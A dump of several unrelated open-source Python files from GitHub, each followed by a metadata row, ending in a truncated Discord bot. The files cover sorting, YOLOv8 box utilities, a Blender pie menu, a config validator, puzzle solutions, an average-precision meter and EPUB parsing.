array = [0.42, 0.32, 0.33, 0.52, 0.37, 0.47, 0.51]
print("Before sorting: ", array)
sorted_array = bucket_sort(array)
print("After sorting: ", sorted_array)
| MYTE21/DSA.Train | (3) Python - Data Structures and Algorithms/Sorting Algorithms/Bucket Sort/Bucket Sort.py | Bucket Sort.py | py | 530 | python | en | code | 2 | github-code | 50 |
36994718564 | import torch
import pkg_resources as pkg
def check_version(current: str = '0.0.0',
                  minimum: str = '0.0.0',
                  name: str = 'version ',
                  pinned: bool = False,
                  hard: bool = False,
                  verbose: bool = False) -> bool:
    """
    Check current version against the required minimum version.
    Args:
        current (str): Current version.
        minimum (str): Required minimum version.
        name (str): Name to be used in warning message.
        pinned (bool): If True, versions must match exactly. If False, minimum version must be satisfied.
        hard (bool): If True, raise an AssertionError if the minimum version is not met.
        verbose (bool): If True, print warning message if minimum version is not met.
    Returns:
        (bool): True if minimum version is met, False otherwise.

    NOTE(review): in this trimmed implementation `name`, `hard`, and
    `verbose` are accepted for API compatibility but have no effect — no
    assertion is raised and no warning is printed.
    """
    current, minimum = (pkg.parse_version(x) for x in (current, minimum))
    result = (current == minimum) if pinned else (current >= minimum)  # bool
    return result
TORCH_1_10 = check_version(torch.__version__, '1.10.0')
def make_anchors(feats, strides, grid_cell_offset=0.5):
    """Generate anchor-point centers and per-anchor strides from feature maps."""
    assert feats is not None
    dtype, device = feats[0].dtype, feats[0].device
    anchor_points = []
    stride_tensor = []
    for level, stride in enumerate(strides):
        _, _, h, w = feats[level].shape
        # Cell-center coordinates for this feature level.
        shift_x = torch.arange(end=w, device=device, dtype=dtype) + grid_cell_offset
        shift_y = torch.arange(end=h, device=device, dtype=dtype) + grid_cell_offset
        if TORCH_1_10:
            grid_y, grid_x = torch.meshgrid(shift_y, shift_x, indexing='ij')
        else:
            # Older torch defaults to 'ij' indexing and lacks the keyword.
            grid_y, grid_x = torch.meshgrid(shift_y, shift_x)
        anchor_points.append(torch.stack((grid_x, grid_y), -1).view(-1, 2))
        stride_tensor.append(torch.full((h * w, 1), stride, dtype=dtype, device=device))
    return torch.cat(anchor_points), torch.cat(stride_tensor)
def dist2bbox(distance, anchor_points, xywh=True, dim=-1):
    """Transform distance(ltrb) to box(xywh or xyxy)."""
    left_top, right_bottom = distance.chunk(2, dim)
    top_left_xy = anchor_points - left_top
    bottom_right_xy = anchor_points + right_bottom
    if not xywh:
        return torch.cat((top_left_xy, bottom_right_xy), dim)  # xyxy bbox
    center_xy = (top_left_xy + bottom_right_xy) / 2
    width_height = bottom_right_xy - top_left_xy
    return torch.cat((center_xy, width_height), dim)  # xywh bbox
def bbox2dist(anchor_points, bbox, reg_max):
    """Transform bbox(xyxy) to dist(ltrb), clamped to [0, reg_max - 0.01]."""
    top_left, bottom_right = bbox.chunk(2, -1)
    distances = torch.cat((anchor_points - top_left, bottom_right - anchor_points), -1)
    return distances.clamp_(0, reg_max - 0.01)  # dist (lt, rb)
def autopad(k, p=None, d=1):  # kernel, padding, dilation
    """Pad to 'same' shape outputs."""
    if d > 1:
        # Effective kernel size once dilation is applied.
        if isinstance(k, int):
            k = d * (k - 1) + 1
        else:
            k = [d * (x - 1) + 1 for x in k]
    if p is None:
        # Half the kernel size gives 'same' padding for odd kernels.
        if isinstance(k, int):
            p = k // 2
        else:
            p = [x // 2 for x in k]
    return p
| madara-tribe/custom-yolov8 | custom/nn/commons.py | commons.py | py | 2,883 | python | en | code | 0 | github-code | 50 |
24000692357 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "Merge: Key: 'Alt M', 'F14'",
"location": "Alf M, F14",
"category": "Mesh",
}
from collections import OrderedDict
from types import MethodType
import bpy
from ..utils import addongroup
import pie_menu
class PieMenuMeshMergeAddonPreferences(
        addongroup.AddonGroup, bpy.types.PropertyGroup):
    """Add-on preferences for the mesh-merge pie menu."""
    bl_idname = __name__
    # Populated below (module scope) with the pie-menu classes to register.
    menus = []
class Empty:
    """Lightweight attribute bag: Empty(a=1).a == 1."""

    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            setattr(self, key, value)
class MeshMerge:
    """Pie-menu definition mirroring Blender's mesh.merge operator options."""
    idname = 'mesh_merge'
    label = 'Merge'
    quick_action = 'LAST'
    item_order = 'CW6'
    def init(self, context):
        """Build one menu item per mesh.merge 'type' enum value."""
        self.menu_items = []
        # Read the operator's enum items from its RNA definition.
        bl_rna = bpy.ops.mesh.merge.get_rna().bl_rna
        prop = bl_rna.properties['type']
        icons = ['BACK', 'FORWARD' , 'ROTATECENTER', 'CURSOR',
                 'ROTATECOLLECTION']
        for enum_item, icon in zip(prop.enum_items, icons):
            item = Empty(label=enum_item.name)
            item.description = enum_item.description
            item.icon = icon
            item.execute = "mesh.merge(type='{}')".format(enum_item.identifier)
            self.menu_items.append(item)
            def poll(self, context):
                """Enable FIRST/LAST merge only when the selection history
                starts/ends with a vertex."""
                import bmesh
                bm = bmesh.from_edit_mesh(context.active_object.data)
                f = l = False
                history = bm.select_history
                if history:
                    if isinstance(history[0], bmesh.types.BMVert):
                        f = True
                    if isinstance(history[-1], bmesh.types.BMVert):
                        l = True
                if 'FIRST' in self.execute and not f:
                    return False
                if 'LAST' in self.execute and not l:
                    return False
                return True
            # Bind poll to this iteration's item (MethodType avoids the
            # classic late-binding closure pitfall: `self` is the item).
            item.poll = MethodType(poll, item)
        # Pad the pie to 8 slots with empty entries.
        for i in range(8 - len(self.menu_items)):
            self.menu_items.append(None)
PieMenuMeshMergeAddonPreferences.menus = [
MeshMerge,
]
menu_keymap_items = {
"mesh_merge": [
["Mesh", {"type": 'M', "value": 'PRESS', "alt": True}],
["Mesh", {"type": 'F14', "value": 'PRESS', "alt": True}],
],
}
classes = [
PieMenuMeshMergeAddonPreferences
]
@PieMenuMeshMergeAddonPreferences.register_addon
def register():
    """Register add-on classes, the pie menu, and its keymap shortcuts."""
    for cls in classes:
        bpy.utils.register_class(cls)
    addon_prefs = PieMenuMeshMergeAddonPreferences.get_instance()
    pie_menu.register_addon(addon_prefs)
    # Install one keymap item per (keymap name, key event) pair declared
    # in menu_keymap_items, wired to the wm.pie_menu operator.
    for idname, km_items in menu_keymap_items.items():
        for km_name, kwargs in km_items:
            km = pie_menu.get_keymap(km_name)
            if km:
                kmi = km.keymap_items.new("wm.pie_menu", **kwargs)
                kmi.properties.menu = idname
@PieMenuMeshMergeAddonPreferences.unregister_addon
def unregister():
    """Unregister the pie menu and add-on classes (reverse of register)."""
    addon_prefs = PieMenuMeshMergeAddonPreferences.get_instance()
    pie_menu.unregister_addon(addon_prefs)
    for cls in classes[::-1]:
        bpy.utils.unregister_class(cls)
| JT-a/blenderpython279 | scripts/addons_extern/ctools-master/piemenu/piemenu_meshmerge.py | piemenu_meshmerge.py | py | 3,776 | python | en | code | 5 | github-code | 50 |
20194608595 | from __future__ import print_function
from ExpressionValidator import ExpressionValidator
from DatasetRepository import DatasetRepository
import re
import json
class ConfigValidator:
    """Validates a JSON transformation-pipeline config against a dataset schema.

    The config names a dataset, a list of transformations and an output
    section.  Each transformation is checked for its required keys and for
    references to columns that actually exist at that point in the pipeline
    (column-altering transforms update ``self.cols`` as they are validated).

    Raises one of this module's exception classes on the first problem found;
    ``validateConfig()`` returns True when everything checks out.
    """
    # operators accepted by the rowSelect transformation
    selectRowOps = ['lt', 'gt', 'le', 'ge', 'eq', 'neq']
    def __init__(self, configStr="", configObj=None):
        # BUG FIX: when a pre-parsed config object was supplied, the old code
        # still called json.loads(configStr) and ignored configObj entirely.
        if configObj is not None:
            self.config = configObj
        elif configStr != "":
            self.config = json.loads(configStr)
        self.dataRepo = DatasetRepository()
        self.funcs = []
        self.cols = []      # current column schema: list of {'name', 'type'} dicts
        self.keyCols = []   # key column names, always carried through rowSum
    def validateConfig(self):
        """Validate the whole config: dataset, every transformation, output."""
        self.loadDataset()
        for t in self.config['transformations']:
            self.validateTransform(t)
        self.checkOutput()
        return True
    def validateTransform(self, trans):
        """Dispatch a single transformation entry to its specific validator."""
        if trans['type'] == 'columnSelect':
            self.columnSelect(trans)
        elif trans['type'] == 'rowSelect':
            self.rowSelect(trans)
        elif trans['type'] == 'rowSum':
            self.rowSum(trans)
        elif trans['type'] == 'columnDefine':
            self.columnDefine(trans)
        else:
            raise UnknownTransformTypeException(trans['type'])
    def loadDataset(self):
        """Resolve the configured dataset and load its column schema."""
        if 'dataset' not in self.config:
            raise MissingGlobalConfigItemException('dataset')
        ds = self.config['dataset']
        if ds not in self.dataRepo.listDatasets():
            raise UnknownDatasetException(ds)
        self.cols = self.dataRepo.getDataset(ds)['columns']
        self.keyCols = self.dataRepo.getDataset(ds)['keyCols']
    def checkOutput(self):
        """Validate the output section (currently only 'leaderboard')."""
        if 'output' not in self.config:
            raise MissingGlobalConfigItemException('output')
        output = self.config['output']
        if output['type'] == 'leaderboard':
            self.checkLeaderboard(output)
        else:
            raise UnknownOutputTypeException(output['type'])
    def checkLeaderboard(self, output):
        """Validate a leaderboard output: known column, asc/desc direction."""
        directionValues = ['asc', 'desc']
        if 'column' not in output:
            raise MissingOutputConfigItemException('column')
        if 'direction' not in output:
            raise MissingOutputConfigItemException('direction')
        if output['column'] not in self.colnames():
            raise UnknownColumnException(output['column'])
        if output['direction'] not in directionValues:
            raise UnknownLeaderboardDirectionException(output['direction'])
    def rowSelect(self, trans):
        """Validate a rowSelect: known column/operator, criteria type matches."""
        col = self.getColumn(trans)
        if 'operator' not in trans:
            raise MissingTransformConfigItemException('rowSelect', 'operator')
        if trans['operator'] not in self.selectRowOps:
            raise UnknownSelectRowsOperatorException(trans['operator'])
        if 'criteria' not in trans:
            raise MissingTransformConfigItemException('rowSelect', 'criteria')
        utype = self.criType(trans['criteria'])
        if utype != col['type']:
            # NOTE(review): RowSelectCriteriaTypeException is not defined in
            # this module -- raising it will NameError. Confirm where it lives.
            raise RowSelectCriteriaTypeException(col['name'], col['type'], utype)
    def columnSelect(self, trans):
        """Validate a columnSelect and narrow the schema to the chosen columns."""
        self.cols = self.getColumns(trans)
    def rowSum(self, trans):
        """Validate a rowSum; resulting schema keeps selected + numeric columns."""
        # BUG FIX: colFilterNumeric() used to return a lazy filter object, so
        # list + filter raised TypeError under Python 3; it now returns a list.
        cols = self.getColumns(trans) + self.colFilterNumeric()
        # de-duplicate by column name, keeping the last occurrence
        self.cols = list({v['name']: v for v in cols}.values())
    def columnDefine(self, trans):
        """Validate a columnDefine: fresh valid name plus a typed expression."""
        if 'column' not in trans:
            raise MissingTransformConfigItemException('columnDefine', 'column')
        if 'expression' not in trans:
            raise MissingTransformConfigItemException('columnDefine', 'expression')
        if not self.strCheck(trans['column']):
            raise BadColumnNameException(trans['column'])
        # BUG FIX: uniqueness was previously checked with
        # "trans['column'] in self.cols", comparing a string against the
        # column dicts, which could never match.
        if trans['column'] in self.colnames():
            raise BadColumnNameException(trans['column'])
        ev = ExpressionValidator({}, self.cols)
        result = ev.validateExpression(trans['expression'])
        node = result.ast.value
        # the new column is numeric unless the expression is a string literal
        colDef = {'name': trans['column'], 'type': 'N'}
        if node.__class__.__name__ == 'Str':
            colDef['type'] = 'S'
        self.cols.append(colDef)
    def colnames(self):
        """Names of the columns currently in the schema."""
        return [c['name'] for c in self.cols]
    def colFilter(self, colName):
        """Return the schema dict for colName (first match)."""
        return next(c for c in self.cols if c['name'] == colName)
    def colFilterNumeric(self):
        """Return the numeric ('N') columns as a list."""
        return [c for c in self.cols if c['type'] == 'N']
    def getColumn(self, trans):
        """Resolve trans['column'] to a schema dict, validating its presence."""
        if 'column' not in trans:
            raise MissingTransformConfigItemException(trans['type'], 'column')
        if trans['column'] not in self.colnames():
            raise UnknownColumnException(trans['column'])
        return self.colFilter(trans['column'])
    def getColumns(self, trans):
        """Resolve trans['columns'] to schema dicts; key columns are appended."""
        if 'columns' not in trans:
            raise MissingTransformConfigItemException(trans['type'], 'columns')
        cols = []
        for col in trans['columns']:
            if col not in self.colnames():
                # BUG FIX: the error previously reported trans['column'],
                # a key that does not exist for multi-column transforms.
                raise UnknownColumnException(col)
            cols.append(self.colFilter(col))
        for col in self.keyCols:
            cols.append(self.colFilter(col))
        return cols
    def criType(self, criteria):
        """Classify a criteria literal: 'N' for a number, 'S' for a string."""
        # BUG FIX: the pattern was unanchored, so '12abc' was typed as numeric.
        if re.match(r'\d+\.?\d*$', criteria):
            return 'N'
        return 'S'
    def strCheck(self, colName):
        """True if colName is a valid new column name (ASCII alphanumerics)."""
        # BUG FIX: the old pattern used [A-z] (which also matches [\]^_` and
        # similar) and was unanchored, so 'bad name' passed via its prefix.
        return re.match(r'[A-Za-z0-9]+$', colName) is not None
class MissingGlobalConfigItemException(Exception):
    """Raised when a required top-level config key (e.g. 'dataset') is absent."""
    def __init__(self, itemName):
        super(MissingGlobalConfigItemException, self).__init__('Missing global config item {}'.format(itemName))
class MissingTransformConfigItemException(Exception):
    """Raised when a transformation entry lacks a required config key.

    Callers pass (typeName, itemName), e.g. ('rowSelect', 'operator').
    """
    def __init__(self, typeName, itemName):
        # BUG FIX: the format arguments were swapped, producing messages like
        # "Missing transformation config item rowSelect for type operator".
        super(MissingTransformConfigItemException, self).__init__(
            'Missing transformation config item {} for type {}'.format(itemName, typeName))
class MissingOutputConfigItemException(Exception):
    """Raised when the output section lacks a required key."""
    def __init__(self, itemName):
        super(MissingOutputConfigItemException, self).__init__('Missing output config item {}'.format(itemName))
class UnknownColumnException(Exception):
    """Raised when a config references a column not present in the schema."""
    def __init__(self, colName):
        super(UnknownColumnException, self).__init__('Unknown column name {}'.format(colName))
class BadColumnNameException(Exception):
    """Raised when a user-defined column name is invalid or already taken."""
    def __init__(self, colName):
        super(BadColumnNameException, self).__init__('Invalid name {} for user-defined column'.format(colName))
class UnknownDatasetException(Exception):
    """Raised when the configured dataset is not in the repository."""
    def __init__(self, dsName):
        super(UnknownDatasetException, self).__init__('Unknown dataset name {}'.format(dsName))
class UnknownSelectRowsOperatorException(Exception):
    """Raised when a rowSelect operator is not one of selectRowOps."""
    def __init__(self, opName):
        super(UnknownSelectRowsOperatorException, self).__init__('Unknown operator name {}'.format(opName))
class UnknownTransformTypeException(Exception):
    """Raised when a transformation 'type' is not recognized."""
    def __init__(self, transName):
        super(UnknownTransformTypeException, self).__init__('Unknown transformation type {}'.format(transName))
class UnknownOutputTypeException(Exception):
    """Raised when the output 'type' is not recognized."""
    def __init__(self, outputName):
        super(UnknownOutputTypeException, self).__init__('Unknown output type {}'.format(outputName))
class UnknownLeaderboardDirectionException(Exception):
    """Raised when the leaderboard 'direction' is not 'asc' or 'desc'."""
    def __init__(self, givenDir):
        # BUG FIX: super() was previously called with UnknownOutputTypeException
        # as the class, which raises TypeError (self is not an instance of it)
        # instead of producing this exception.
        super(UnknownLeaderboardDirectionException, self).__init__(
            'Unknown value {} given for direction in leaderboard config'.format(givenDir))
| bryantrobbins/baseball | shared/btr3baseball/ConfigValidator.py | ConfigValidator.py | py | 7,537 | python | en | code | 22 | github-code | 50 |
# This problem could be solved with DFS and tracking nop/jmp with a stack
def find_fixed_acc(lines):
    """Brute-force AoC 2020 day 8 part 2.

    Each outer pass runs the program once, flipping the first not-yet-tried
    nop<->jmp instruction it reaches.  When a run reaches one past the last
    instruction (normal termination), return the accumulator value.

    lines: list of strings like 'acc +3' (trailing newlines are fine).
    Returns the accumulator after the fixed program terminates.
    """
    attempted_fix_idx = set()  # instructions whose flip has already been tried
    finish_idx = len(lines)
    while True:
        tried_fix = False      # at most one flip per run
        acc = 0
        idx = 0
        visited_idx = set()
        while True:
            visited_idx.add(idx)
            op, arg = lines[idx].strip().split(' ')
            arg = int(arg)
            if op == 'nop':
                if idx not in attempted_fix_idx and not tried_fix:
                    attempted_fix_idx.add(idx)
                    tried_fix = True
                    idx += arg        # run it as jmp this time
                else:
                    idx += 1
            elif op == 'acc':
                acc += arg
                idx += 1
            elif op == 'jmp':
                if idx not in attempted_fix_idx and not tried_fix:
                    attempted_fix_idx.add(idx)
                    tried_fix = True
                    idx += 1          # run it as nop this time
                else:
                    idx += arg
            # stop on a revisit (infinite loop) or on normal termination
            if idx in visited_idx or idx == finish_idx:
                break
        if idx == finish_idx:
            return acc
if __name__ == '__main__':
    # IMPROVEMENT: file I/O and printing moved under a main guard so the
    # solver can be imported without side effects.
    with open('input.txt') as f:
        lines = f.readlines()
    print(find_fixed_acc(lines))
| cdabella/advent_of_code | 2020/day08/day8pt2_bruteforce.py | day8pt2_bruteforce.py | py | 1,220 | python | en | code | 0 | github-code | 50 |
38656605907 | # https://leetcode.com/problems/product-of-array-except-self/?envType=study-plan-v2&envId=top-interview-150
from functools import reduce
from typing import List
class Solution:
    def productExceptSelf(self, nums: List[int]) -> List[int]:
        """Return out[i] = product of all nums except nums[i], without division.

        BUG FIX: the previous division-based version was wrong for zeros
        (every entry became the total product, i.e. 0), wrong for negative
        numbers (the `el > 0` branch skipped the division entirely), and used
        float `el ** -1`, which loses precision for large products.

        Classic two-pass prefix/suffix product: O(n) time, O(1) extra space
        beyond the output, integer-exact.
        """
        n = len(nums)
        out = [1] * n
        # forward pass: out[i] = product of nums[0..i-1]
        prefix = 1
        for i in range(n):
            out[i] = prefix
            prefix *= nums[i]
        # backward pass: multiply in product of nums[i+1..n-1]
        suffix = 1
        for i in range(n - 1, -1, -1):
            out[i] *= suffix
            suffix *= nums[i]
        return out
if __name__ == "__main__":
    # Ad-hoc demo unrelated to the class above: rotates the list left by i
    # positions via slice concatenation. With i = 5 >= len(a), a[5:] is empty
    # and a[:5] is the whole list, so this prints the original list.
    a = [1, 2, 3]
    i = 5
    print(a[i:] + a[:i])
27342003268 | import math
from urllib.request import urlretrieve
import torch
from PIL import Image
from tqdm import tqdm
import numpy as np
import random
import torch.nn.functional as F
def download_url(url, destination=None, progress_bar=True):
    """Download a URL to a local file.
    Parameters
    ----------
    url : str
        The URL to download.
    destination : str, None
        The destination of the file. If None is given the file is saved to a temporary directory.
    progress_bar : bool
        Whether to show a command-line progress bar while downloading.
    Returns
    -------
    filename : str
        The location of the downloaded file.
    Notes
    -----
    Progress bar use/example adapted from tqdm documentation: https://github.com/tqdm/tqdm
    """
    def my_hook(t):
        # urlretrieve reporthook adapter: t is a tqdm instance; last_b tracks
        # the block count reported by the previous callback invocation.
        last_b = [0]
        def inner(b=1, bsize=1, tsize=None):
            if tsize is not None:
                t.total = tsize
            if b > 0:
                t.update((b - last_b[0]) * bsize)
                last_b[0] = b
        return inner
    if progress_bar:
        with tqdm(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
            filename, _ = urlretrieve(url, filename=destination, reporthook=my_hook(t))
    else:
        filename, _ = urlretrieve(url, filename=destination)
    # BUG FIX: the docstring documents a return value, but the function
    # previously fell off the end and returned None.
    return filename
class AveragePrecisionMeter(object):
    """
    The APMeter measures the average precision per class.
    The APMeter is designed to operate on `NxK` Tensors `output` and
    `target`, and optionally a `Nx1` Tensor weight where (1) the `output`
    contains model output scores for `N` examples and `K` classes that ought to
    be higher when the model is more convinced that the example should be
    positively labeled, and smaller when the model believes the example should
    be negatively labeled (for instance, the output of a sigmoid function); (2)
    the `target` contains only values 0 (for negative examples) and 1
    (for positive examples); and (3) the `weight` ( > 0) represents weight for
    each sample.
    """
    def __init__(self, threshold=0.5, difficult_examples=False):
        # threshold: score cutoff used by overall()/overall_topk()
        # difficult_examples: if True, samples labeled 0 are skipped when
        # computing per-class average precision
        super(AveragePrecisionMeter, self).__init__()
        self.reset()
        self.difficult_examples = difficult_examples
        self.threshold = threshold
    def reset(self):
        """Resets the meter with empty member variables"""
        # scores/targets grow row-wise as add() is called; backed by
        # manually-resized storages to amortize reallocation.
        self.scores = torch.FloatTensor(torch.FloatStorage())
        self.targets = torch.LongTensor(torch.LongStorage())
    def add(self, output, target):
        """
        Args:
            output (Tensor): NxK tensor that for each of the N examples
                indicates the probability of the example belonging to each of
                the K classes, according to the model. The probabilities should
                sum to one over all classes
            target (Tensor): binary NxK tensort that encodes which of the K
                classes are associated with the N-th input
                (eg: a row [0, 1, 0, 1] indicates that the example is
                associated with classes 2 and 4)
            weight (optional, Tensor): Nx1 tensor representing the weight for
                each example (each weight > 0)
        """
        # coerce numpy inputs to tensors and normalize both to 2-D (N x K)
        if not torch.is_tensor(output):
            output = torch.from_numpy(output)
        if not torch.is_tensor(target):
            target = torch.from_numpy(target)
        if output.dim() == 1:
            output = output.view(-1, 1)
        else:
            assert output.dim() == 2, \
                'wrong output size (should be 1D or 2D with one column \
                per class)'
        if target.dim() == 1:
            target = target.view(-1, 1)
        else:
            assert target.dim() == 2, \
                'wrong target size (should be 1D or 2D with one column \
                per class)'
        if self.scores.numel() > 0:
            assert target.size(1) == self.targets.size(1), \
                'dimensions for output should match previously added examples.'
        # make sure storage is of sufficient size
        # (grow by 1.5x to amortize repeated appends)
        if self.scores.storage().size() < self.scores.numel() + output.numel():
            new_size = math.ceil(self.scores.storage().size() * 1.5)
            self.scores.storage().resize_(int(new_size + output.numel()))
            self.targets.storage().resize_(int(new_size + output.numel()))
        # store scores and targets
        # (resize the tensor view to include the new rows, then copy them in)
        offset = self.scores.size(0) if self.scores.dim() > 0 else 0
        self.scores.resize_(offset + output.size(0), output.size(1))
        self.targets.resize_(offset + target.size(0), target.size(1))
        self.scores.narrow(0, offset, output.size(0)).copy_(output)
        self.targets.narrow(0, offset, target.size(0)).copy_(target)
    def value(self):
        """Returns the model's average precision for each class
        Return:
            ap (FloatTensor): 1xK tensor, with avg precision for each class k
        """
        if self.scores.numel() == 0:
            return 0
        ap = torch.zeros(self.scores.size(1))
        # NOTE(review): rg is never used below -- looks like dead code.
        rg = torch.arange(1, self.scores.size(0)).float()
        # compute average precision for each class
        for k in range(self.scores.size(1)):
            # sort scores
            scores = self.scores[:, k]
            targets = self.targets[:, k]
            # compute average precision
            ap[k] = AveragePrecisionMeter.average_precision(scores, targets, self.difficult_examples)
        return ap
    @staticmethod
    def average_precision(output, target, difficult_examples=True):
        """Average precision for one class: mean of precision@i over positives.

        NOTE(review): if no positive (non-difficult) samples exist, pos_count
        stays 0 and the final division raises ZeroDivisionError -- confirm
        callers guarantee at least one positive per class.
        """
        # sort examples
        sorted, indices = torch.sort(output, dim=0, descending=True)
        # Computes prec@i
        pos_count = 0.
        total_count = 0.
        precision_at_i = 0.
        for i in indices:
            label = target[i]
            if difficult_examples and label == 0:
                continue
            if label == 1:
                pos_count += 1
            total_count += 1
            if label == 1:
                precision_at_i += pos_count / total_count
        precision_at_i /= pos_count
        return precision_at_i
    def overall(self):
        """Micro/macro precision, recall and F1 over all added samples."""
        if self.scores.numel() == 0:
            return 0
        # normalize score
        scores = F.sigmoid(self.scores).cpu().numpy()
        targets = self.targets.cpu().numpy()
        targets[targets == -1] = 0
        return self.evaluation(scores, targets)
    def overall_topk(self, k):
        """Same metrics as overall(), keeping only each sample's top-k scores."""
        # normalize score
        targets = self.targets.cpu().numpy()
        targets[targets == -1] = 0
        n, c = self.scores.size()
        scores = np.zeros((n, c)) - 1
        index = self.scores.topk(k, 1, True, True)[1].cpu().numpy()
        tmp = F.sigmoid(self.scores).cpu().numpy()
        for i in range(n):
            for ind in index[i]:
                # mark a top-k entry positive only if it also clears threshold
                scores[i, ind] = 1 if tmp[i, ind] >= self.threshold else -1
        return self.evaluation(scores, targets)
    def evaluation(self, scores_, targets_):
        """Compute (OP, OR, OF1, CP, CR, CF1).

        O* are micro-averaged over all predictions; C* are macro-averaged
        per class.
        """
        n, n_class = scores_.shape
        Nc, Np, Ng = np.zeros(n_class), np.zeros(n_class), np.zeros(n_class)
        for k in range(n_class):
            scores = scores_[:, k]
            targets = targets_[:, k]
            targets[targets == -1] = 0
            Ng[k] = np.sum(targets == 1)
            Np[k] = np.sum(scores >= self.threshold)
            Nc[k] = np.sum(targets * (scores >= self.threshold))
        # avoid division by zero for classes that were never predicted
        Np[Np == 0] = 1
        OP = np.sum(Nc) / np.sum(Np)
        OR = np.sum(Nc) / np.sum(Ng)
        OF1 = (2 * OP * OR) / (OP + OR)
        CP = np.sum(Nc / Np) / n_class
        CR = np.sum(Nc / Ng) / n_class
        CF1 = (2 * CP * CR) / (CP + CR)
        return OP, OR, OF1, CP, CR, CF1
10418024287 | from typing import List, Union
from ebooklib.epub import Link, Section
from bs4 import BeautifulSoup, Tag, NavigableString, Comment
from typography import Title, Paragraph, TypographyList
# Tags whose content is never extracted as text.
# BUG FIX: a missing comma after 'style' made Python concatenate the adjacent
# string literals into 'styleimg', so neither 'style' nor 'img' was actually
# filtered out by parse_content().
disallowed_tags = ['[document]', 'noscript', 'header', 'html',
                   'meta', 'head', 'input', 'script', 'style',
                   'img', 'iframe', 'textarea', 'button', 'select',
                   'canvas', 'svg']
# Heading tags mapped to Title entries by parse_content().
title_tags = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6']
# Body-text tags mapped to Paragraph entries by parse_content().
text_tags = ['p']
def get_links_from_toc(toc: List[Union[Link, Section]]) -> List[Link]:
    """Flatten an EPUB table of contents into a flat list of Link objects.

    Sections are converted to Links (href + title); nested tuples/lists are
    walked recursively, preserving document order.
    """
    links = []
    def walk(node):
        if isinstance(node, Link):
            links.append(node)
        elif isinstance(node, Section):
            links.append(Link(node.href, node.title))
        elif isinstance(node, (tuple, list)):
            for child in node:
                walk(child)
    for entry in toc:
        walk(entry)
    return links
def get_page_content(file_content, start_identifier, end_identifier) -> List[Union[Tag, NavigableString]]:
    """Return body content between the elements with the given id attributes.

    Parses file_content as HTML, then destructively trims the tree so that
    everything before the element with id=start_identifier (and, if given,
    everything from the element with id=end_identifier onward) is removed.

    Raises a bare Exception when start_identifier is falsy or not found.
    """
    soup = BeautifulSoup(file_content, 'html.parser')
    start = None
    end = None
    if not start_identifier:
        raise Exception()
    start = soup.body.find(attrs={'id': start_identifier})
    if not start:
        raise Exception()
    if end_identifier:
        end = soup.body.find(attrs={'id': end_identifier})
    def clean(first_element, mode):
        # Walk from first_element up to <body>, deleting siblings at each
        # ancestor level: mode 'up' drops everything before the element
        # (keeping it), mode 'down' drops the element and everything after.
        if mode != 'up' and mode != 'down':
            raise Exception()
        current = first_element
        while current != soup.body.parent:
            parent = current.parent
            index_current = parent.contents.index(current)
            if mode == 'up':
                del(parent.contents[:index_current])
            else:
                if current == first_element:
                    # at the deepest level the end element itself is removed
                    del(parent.contents[index_current:])
                else:
                    del(parent.contents[index_current + 1:])
            current = parent
    clean(start, 'up')
    if end:
        clean(end, 'down')
    return soup.body.contents
def parse_content(content: List[Union[Tag, NavigableString]]) -> TypographyList:
    """Convert trimmed page content into a TypographyList of Title/Paragraph.

    Headings (title_tags) become Title entries, <p> and loose text become
    Paragraph entries; disallowed tags are dropped; anything else is
    descended into recursively, preserving document order.
    """
    text_list = []
    def func(x):
        # NOTE: the Comment check must stay before NavigableString --
        # bs4's Comment is a NavigableString subclass, so reordering these
        # branches would emit HTML comments as paragraphs.
        if isinstance(x, Comment):
            pass
        elif isinstance(x, NavigableString):
            text = x.strip()
            if text:
                text_list.append(Paragraph(text=text))
        elif isinstance(x, Tag):
            if x.name in title_tags:
                text = x.get_text().strip()
                if text:
                    text_list.append(Title(text=text))
            elif x.name in text_tags:
                text = x.get_text().strip()
                if text:
                    text_list.append(Paragraph(text=text))
            elif x.name in disallowed_tags:
                pass
            else:
                # unknown container tag: recurse into its children
                for i in x.contents:
                    func(i)
    for item in content:
        func(item)
    return TypographyList(text_list)
| c4rls/projeto-integrador | projeto_integrador/utils.py | utils.py | py | 2,933 | python | en | code | 1 | github-code | 50 |
73407137754 | '''
args - unnamed (positional) variadic arguments.
Lets a function accept as many arguments as you want,
even ones that are not defined in advance.
* - *args (packing and unpacking)
'''
def soma(*args):
    """Sum every positional argument, printing each accumulation step.

    BUG FIX: the function previously computed the total but never returned
    it, so callers that captured the result always got None.
    """
    total = 0
    for numero in args:
        print('Total', total, numero)
        total += numero
    print('Total', total)
    return total
numeros = 1, 2, 3, 4, 5, 6, 7, 8  # this is a tuple
outra_soma = soma(*numeros)
print(outra_soma)  # the tuple must first be unpacked with * before calling soma,
# because otherwise it would be passed as one single iterable argument
soma(1,2,3,4,5,6,7,8)
print(sum((numeros)))  # built-in sum over the tuple, for comparison
7857087798 | import os
import discord
import asyncio
from replit import db
from datetime import date
# from dotenv import load_dotenv
# from ds import *
# load_dotenv()
TOKEN = os.environ["DISCORD_TOKEN"]
prefix = ":V"
bot = discord.Client()
print("running")
#db functions
def addDB(cat, item):
    """Placeholder for storing `item` under category `cat` in the replit db.

    TODO: not implemented yet.
    """
    pass
# -----------------------
def emb(t, desc="", col=0x3AABC2):
    """Return a discord.Embed built from a title, optional description and color."""
    return discord.Embed(title=t, description=desc, color=col)
@bot.event
async def on_ready():
    """Log the bot identity and advertise the help command via presence."""
    print(f'Logged in as {bot.user} (ID: {bot.user.id})')
    activity = discord.Game(name=f"Disco-Life | {prefix} help", type=3)
    await bot.change_presence(status=discord.Status.online, activity=activity)
@bot.event
async def on_message(message):
    """Main command dispatcher: reacts to mentions and `<prefix> <command>`."""
    # ignore the bot's own messages to avoid reply loops
    if message.author == bot.user:
        return
    else:
        # a bare mention gets a greeting tailored to new vs. known players
        if bot.user.mentioned_in(message):
